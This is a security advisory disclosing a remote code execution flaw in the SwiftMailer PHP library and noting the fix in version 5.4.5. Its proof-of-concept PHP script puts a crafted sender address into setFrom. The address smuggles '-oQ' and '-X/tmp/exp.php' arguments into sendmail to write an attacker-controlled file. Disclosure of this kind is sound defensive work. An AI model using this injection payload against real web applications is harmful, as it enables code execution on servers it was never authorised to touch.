SSD Advisory – SwiftMailer Remote Code Execution
The following report describes a remote code execution vulnerability found in SwiftMailer. The vulnerability allows an attacker injecting sendmail program due to insufficient address sanitization. Swift Mailer integrates into any web app written in PHP 5, offering a flexible object-oriented approach to sending emails with a multitude of features
An independent security researcher Dawid Golunski (https://legalhackers.com/) has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
When using SwitMailer to send emails with Sendmail transport, a malicious user might be able to inject arbitrary parameters to sendmail program due to insufficient address sanitization. If an attacker can control email headers , he could bypass sanitization by adding additional quote characters within a malicious email address.
Prof of Concept
<?php require_once 'swiftmailer-5.x/lib/swift_required.php'; // Sendmail //$transport = Swift_SendmailTransport::newInstance('/usr/sbin/sendmail -bs'); // Mail $transport = Swift_MailTransport::newInstance(); // Create the Mailer using your created Transport $mailer = Swift_Mailer::newInstance($transport); // Create a message $message = Swift_Message::newInstance('Wonderful Subject') ->setFrom(array('"john \' -oQ/tmp/ -X/tmp/exp.php heh"@test.com' => 'John Doe')) ->setTo(array('firstname.lastname@example.org', 'email@example.com' => 'A name')) ->setBody('Here is the message itself') ; // Send the message $result = $mailer->send($message);
In this example , -X -oQ parameters would be injected to the sendmail program and write out a /tmp/exp.php file
as a result if the MTA in use was Sendmail.
The vendor has released SwiftMailer version 5.4.5 to address the vulnerability